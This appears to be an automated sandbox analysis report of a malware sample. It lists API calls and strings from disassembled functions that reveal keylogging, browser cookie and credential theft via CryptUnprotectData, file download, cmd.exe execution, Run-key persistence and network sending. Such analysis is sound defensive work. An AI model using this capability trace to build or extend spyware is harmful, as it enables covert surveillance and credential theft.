                    • API String ID: 4269425633-0
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                    • __alloca_probe_16.LIBCMT ref: 004511B1
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                    • __freea.LIBCMT ref: 0045121D
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                    • String ID:
                    • API String ID: 313313983-0
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                    • _free.LIBCMT ref: 0044F3BF
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    APIs
                    • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                    • _free.LIBCMT ref: 004482D3
                    • _free.LIBCMT ref: 004482FA
                    • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                    • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    APIs
                    • _free.LIBCMT ref: 004509D4
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 004509E6
                    • _free.LIBCMT ref: 004509F8
                    • _free.LIBCMT ref: 00450A0A
                    • _free.LIBCMT ref: 00450A1C
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    APIs
                    • _free.LIBCMT ref: 00444066
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00444078
                    • _free.LIBCMT ref: 0044408B
                    • _free.LIBCMT ref: 0044409C
                    • _free.LIBCMT ref: 004440AD
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    APIs
                    • _strpbrk.LIBCMT ref: 0044E738
                    • _free.LIBCMT ref: 0044E855
                      • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                      • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                      • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                    • String ID: *?$.
                    • API String ID: 2812119850-3972193922
                    APIs
                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                      • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFileKeyboardLayoutNameconnectsend
                    • String ID: XQG$NG$PG
                    • API String ID: 1634807452-3565412412
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: `#D$`#D
                    • API String ID: 885266447-2450397995
                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63B11986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                    • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                    • String ID: /sort "Visit Time" /stext "$0NG
                    • API String ID: 368326130-3219657780
                    APIs
                    • SystemParametersInfoW.USER32 ref: 0041CAD7
                      • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                      • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                      • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateInfoParametersSystemValue
                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                    • API String ID: 4127273184-3576401099
                    APIs
                    • _wcslen.LIBCMT ref: 004162F5
                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                      • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                      • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                      • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcslen$CloseCreateValue
                    • String ID: !D@$okmode$PG
                    • API String ID: 3411444782-3370592832
                    APIs
                      • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                    Strings
                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                    • User Data\Default\Network\Cookies, xrefs: 0040C603
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                    • API String ID: 1174141254-1980882731
                    APIs
                      • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                    Strings
                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                    • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                    • API String ID: 1174141254-1980882731
                    APIs
                    • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                    • wsprintfW.USER32 ref: 0040B1F3
                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: EventLocalTimewsprintf
                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                    • API String ID: 1497725170-1359877963
                    APIs
                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                    • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$LocalTime$wsprintf
                    • String ID: Online Keylogger Started
                    • API String ID: 112202259-1258561607
                    APIs
                    • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                    • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: CryptUnprotectData$crypt32
                    • API String ID: 2574300362-2380590389
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                    • CloseHandle.KERNEL32(?), ref: 004051CA
                    • SetEvent.KERNEL32(?), ref: 004051D9
                    Strings
                    Similarity
                    • API ID: CloseEventHandleObjectSingleWait
                    • String ID: Connection Timeout
                    • API String ID: 2055531096-499159329
                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                    Strings
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                    • API String ID: 2005118841-1866435925
                    APIs
                    • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                    • RegSetValueExW.ADVAPI32 ref: 0041384D
                    • RegCloseKey.ADVAPI32(004752D8), ref: 00413858
                    Strings
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: pth_unenc
                    • API String ID: 1818849710-4028850238
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                    Strings
                    Similarity
                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                    • String ID: bad locale name
                    • API String ID: 3628047217-1405518554
                    APIs
                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                    • ShowWindow.USER32(00000009), ref: 00416C61
                    • SetForegroundWindow.USER32 ref: 00416C6D
                      • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                      • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                      • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                    Strings
                    Similarity
                    • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                    • String ID: !D@
                    • API String ID: 3446828153-604454484
                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                    Strings
                    Similarity
                    • API ID: ExecuteShell
                    • String ID: /C $cmd.exe$open
                    • API String ID: 587946157-3896048727
                    APIs
                    • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                    • UnhookWindowsHookEx.USER32 ref: 0040B8C7
                    • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                    Strings
                    Similarity
                    • API ID: TerminateThread$HookUnhookWindows
                    • String ID: pth_unenc
                    • API String ID: 3123878439-4028850238
                    APIs
                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                    • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                    Strings
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: GetCursorInfo$User32.dll
                    • API String ID: 1646373207-2714051624
                    APIs
                    • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                    • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetLastInputInfo$User32.dll
                    • API String ID: 2574300362-1519888992
                    APIs
                    Similarity
                    • API ID: __alldvrm$_strrchr
                    • String ID:
                    • API String ID: 1036877536-0
                    APIs
                    Strings
                    • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                    • Cleared browsers logins and cookies., xrefs: 0040C0F5
                    Similarity
                    • API ID: Sleep
                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                    • API String ID: 3472027048-1236744412
                    APIs
                      • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                      • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
                      • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
                    • Sleep.KERNEL32(000001F4), ref: 0040A573
                    • Sleep.KERNEL32(00000064), ref: 0040A5FD
                    Strings
                    Similarity
                    • API ID: Window$SleepText$ForegroundLength
                    • String ID: [ $ ]
                    • API String ID: 3309952895-93608704
                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
                    • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                    Similarity
                    • API ID: File$CloseCreateHandleReadSize
                    • String ID:
                    • API String ID: 3919263394-0
                    APIs
                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                    • CloseHandle.KERNEL32(00000000), ref: 0041C233
                    • CloseHandle.KERNEL32(00000000), ref: 0041C23B
                    Similarity
                    • API ID: CloseHandleOpenProcess
                    • String ID:
                    • API String ID: 39102293-0
                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                      • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                    • _UnwindNestedFrames.LIBCMT ref: 00439891
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                    • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                    Similarity
                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                    • String ID:
                    • API String ID: 2633735394-0
                    APIs
                    Similarity
                    • API ID: MetricsSystem
                    • String ID:
                    • API String ID: 4116985748-0
                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                      • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                    Strings
                    Similarity
                    • API ID: ErrorHandling__start
                    • String ID: pow
                    • API String ID: 3213639722-2276729525
                    APIs
                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                    • __Init_thread_footer.LIBCMT ref: 0040B797
                    Strings
                    Similarity
                    • API ID: Init_thread_footer__onexit
                    • String ID: [End of clipboard]$[Text copied to clipboard]
                    • API String ID: 1881088180-3686566968
                    APIs
                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                    Strings
                    Similarity
                    • API ID:
                    • String ID: ACP$OCP
                    • API String ID: 0-711371036
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00449C3C
                    • GetFileType.KERNEL32 ref: 00449C4E
                    Strings
                    Similarity
                    • API ID: FileHandleType
                    • String ID: O
                    • API String ID: 3000768030-2623078450
                    APIs
                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                    Strings
                    • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                    Similarity
                    • API ID: LocalTime
                    • String ID: KeepAlive | Enabled | Timeout:
                    • API String ID: 481472006-1507639952
                    APIs
                    Strings
                    Similarity
                    • API ID: _free
                    • String ID: O
                    • API String ID: 269201875-2623078450
                    APIs
                    • Sleep.KERNEL32 ref: 00416640
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                    Strings
                    Similarity
                    • API ID: DownloadFileSleep
                    • String ID: !D@
                    • API String ID: 1931167962-604454484
                    APIs
                    • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    Strings
                    Similarity
                    • API ID: LocalTime
                    • String ID: | $%02i:%02i:%02i:%03i
                    • API String ID: 481472006-2430845779
                    APIs
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                    Strings
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: alarm.wav$hYG
                    • API String ID: 1174141254-2782910960
                    APIs
                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • CloseHandle.KERNEL32(?), ref: 0040B0B4
                    • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                    Strings
                    Similarity
                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                    • String ID: Online Keylogger Stopped
                    • API String ID: 1623830855-1496645233
                    APIs
                      • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                    • DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
                    • _free.LIBCMT ref: 00449ACC
                    Strings
                    Similarity
                    • API ID: CriticalSection$DeleteEnter_free
                    • String ID: O
                    • API String ID: 1836352639-2623078450
                    APIs
                    • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                    • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                    Strings
                    Similarity
                    • API ID: wave$BufferHeaderPrepare
                    • String ID: XMG
                    • API String ID: 2315374483-813777761
                    APIs
                    • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                    Strings
                    Similarity
                    • API ID: LocaleValid
                    • String ID: IsValidLocaleName$JD
                    • API String ID: 1901932003-2234456777
                    APIs
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                    Strings
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                    • API String ID: 1174141254-4188645398
                    APIs
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                    Strings
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                    • API String ID: 1174141254-2800177040
                    APIs
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                    Strings
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: AppData$\Opera Software\Opera Stable\
                    • API String ID: 1174141254-1629609700
                    APIs
                    Strings
                    Similarity
                    • API ID: _free
                    • String ID: .P
                    • API String ID: 269201875-2220739652
                    APIs
                    • GetKeyState.USER32(00000011), ref: 0040B64B
                      • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                      • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                      • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                      • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                      • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                    Strings
                    Similarity
                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                    • String ID: [AltL]$[AltR]
                    • API String ID: 2738857842-2658077756
                    APIs
                    • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                    • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                    Strings
                    Similarity
                    • API ID:
                    • String ID: uD
                    • API String ID: 0-2547262877
                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                    Strings
                    Similarity
                    • API ID: ExecuteShell
                    • String ID: !D@$open
                    • API String ID: 587946157-1586967515
                    APIs
                    • GetKeyState.USER32(00000012), ref: 0040B6A5
                    Strings
                    Similarity
                    • API ID: State
                    • String ID: [CtrlL]$[CtrlR]
                    • API String ID: 1649606143-2446555240
                    APIs
                      • Part of subcall function 00449A5C: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
                      • Part of subcall function 00449A5C: _free.LIBCMT ref: 00449ACC
                      • Part of subcall function 00449AFC: _free.LIBCMT ref: 00449B1E
                    • DeleteCriticalSection.KERNEL32(004FE6C0), ref: 0043C1F1
                    • _free.LIBCMT ref: 0043C205
                    Strings
                    Similarity
                    • API ID: _free$CriticalDeleteSection
                    • String ID: O
                    • API String ID: 1906768660-2623078450
                    APIs
                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                    • __Init_thread_footer.LIBCMT ref: 00410F29
                    Strings
                    Similarity
                    • API ID: Init_thread_footer__onexit
                    • String ID: ,kG$0kG
                    • API String ID: 1881088180-2015055088
                    APIs
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                    Similarity
                    • API ID: DeleteOpenValue
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                    • API String ID: 2654517830-1051519024
                    APIs
                    • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                    • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                    Strings
                    Similarity
                    • API ID: DeleteDirectoryFileRemove
                    • String ID: pth_unenc
                    • API String ID: 3325800564-4028850238
                    APIs
                    • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                    • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                    Strings
                    Similarity
                    • API ID: ObjectProcessSingleTerminateWait
                    • String ID: pth_unenc
                    • API String ID: 1872346434-4028850238
                    APIs
                    Strings
                    Similarity
                    • API ID: CommandLine
                    • String ID: 82K
                    • API String ID: 3253501508-3645350227
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                    • GetLastError.KERNEL32 ref: 00440D35
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast
                    • String ID:
                    • API String ID: 1717984340-0
                    APIs
                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                    • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
